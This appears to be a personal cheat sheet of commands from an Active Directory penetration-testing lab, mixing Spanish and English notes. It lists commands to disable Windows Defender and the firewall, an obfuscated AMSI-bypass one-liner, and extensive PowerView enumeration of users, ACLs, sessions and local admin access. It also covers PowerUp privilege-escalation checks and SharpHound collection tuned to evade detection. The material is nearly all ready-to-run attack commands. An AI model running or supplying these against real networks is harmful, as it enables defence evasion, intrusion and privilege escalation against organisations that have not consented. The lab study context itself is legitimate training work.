Comandos

runas /user:chichocorp.local\mrdesdes powershell.exe

powershell -ep bypass

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true

netsh advfirewall set allprofiles state off

PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\> Get-AppLockerPolicy -Effective

Version RuleCollections RuleCollectionTypes
------- --------------- -------------------
      1 {0, 0, 0, 0...} {Appx, Dll, Exe, Msi...}

PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections


PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%PROGRAMFILES%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 06dce67b-934c-454f-a263-2515c8796a5d
Name                : (Default Rule) All scripts located in the Program Files folder
Description         : Allows members of the Everyone group to run scripts that are located in the Program Files folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%WINDIR%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name                : (Default Rule) All scripts located in the Windows folder
Description         : Allows members of the Everyone group to run scripts that are located in the Windows folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

PS C:\AD\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools\ADModule-master> cd .\ActiveDirectory\
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1

Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator

# Obteniendo la informacion del dominio
Get-DomainComputer -Domain chichocorp.local

# Obteniendo Trusts
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

Get-ADTrust
Get-ADTrust -Identity chichocorp.local

# Obteniendo Forest
Get-Forest
Get-Forest -Forest chichocorp.local

# Obteniendo all global catalogs del forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Get Forest Domain
Get-ForestDomain
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
Get-ForestDomain -Forest chichocorp.local | %{Get-DomainTrust -Domain $_.Name}

# Get domain policy for the current domain
(Get-DomainPolicyData).systemaccess
(Get-DomainPolicyData -Domain chichocorp.local).systemaccess

# Get domain controllers for the current domain
Get-DomainController -Domain chichocorp.local

# Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity mrdesdes

# Get list of all properties for users in the current domain
Get-DomainUser -Identity mrdesdes -Properties *
Get-DomainUser -Properties samaccountname,logonCount

# Search for a particular string in a user's attributes:
Get-DomainUser -LDAPFilter "Description=*password*" | Select name,Description

# Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server*" | select name,operatingsystem
Get-DomainComputer -ping
Get-DomainComputer -ping | select Name

# Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain chichocorp.local

# Get all groups containing the word "admin" in group name
Get-DomainGroup *admin*
Get-DomainGroup *admin* | select Name

# Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName

# Get the group membership for a user
Get-DomainGroup -UserName "mrdesdes"

# List all the local groups on a machine (needs administrator privs on non-dc
machines)
Get-NetLocalGroup -ComputerName desktop-828ljno

# Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroupMember -ComputerName desktop-828ljno -GroupName Administrators

# Get actively logged users on a computer (needs local admin rights on
the target)
Get-NetLoggedon -ComputerName desktop-828ljno
Get-NetLoggedon -ComputerName desktop-828ljno | select UserName

# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName desktop-828ljno

# Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName desktop-828ljno

# Find shares on hosts in current domain
Invoke-ShareFinder -Verbose

# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

# Get all fileservers of the domain
Get-NetFileServer

# Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO -ComputerIdentity desktop-828ljno

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity desktop-828ljno

# Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity mrdesdes -Verbose

# Get OUs in a domain
Get-DomainOU

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{6AC1786C-016F-11D2-945F-00C04fB984F9}"

# Get the ACLs associated with the specified object

Get-DomainObjectAcl -SamAccountName mrdesdes -ResolveGUIDs

# Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=chichocorp,DC=local" -ResolveGUIDs -Verbose

# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=chichocorp,DC=local').Access //No me funciona xd

# Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

# Get the ACLs associated with the specified path
Get-PathAcl -Path "\\chichocorp.local\sysvol"
Get-PathAcl -Path "\\desktop-828ljno.chichocorp.local\c$"

# Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

# Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest chichocorp.local
(Get-ADForest).Domains

# Get all global catalogs for the current forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose //This function queries the DC of the current or provided domain for a list of computers (GetNetComputer) and then use multi-threaded Invoke-CheckLocalAdminAccess on each machine.

# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

# Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess)
Find-DomainUserLocation -CheckAccess

# Find computers (File Servers and Distributed File servers) where a domain admin session is available.
Find-DomainUserLocation -Stealth

# List sessions on remote machines (https://github.com/Leo4j/InvokeSessionHunter)
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt

# Get services with unquoted paths and a space in their name
Get-UnquotedService -Verbose

# Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify.

Get-ModifiableService -Verbose

# Run all checks from PowerUp
Invoke-AllChecks

Jenkins - lab

# Import SharpHound
. .\SharpHound.ps1

# Run all methods
Invoke-BloodHound -CollectionMethod All
SharpHound.exe

# To make BloodHound collection stealthy
Invoke-BloodHound –Steatlh
SharpHound.exe –-steatlh

# To avoid detections like MDI

Invoke-BloodHound -ExcludeDCs

echo 'deb https://debian.neo4j.com stable 4' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null

echo 'deb https://debian.neo4j.com stable latest' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null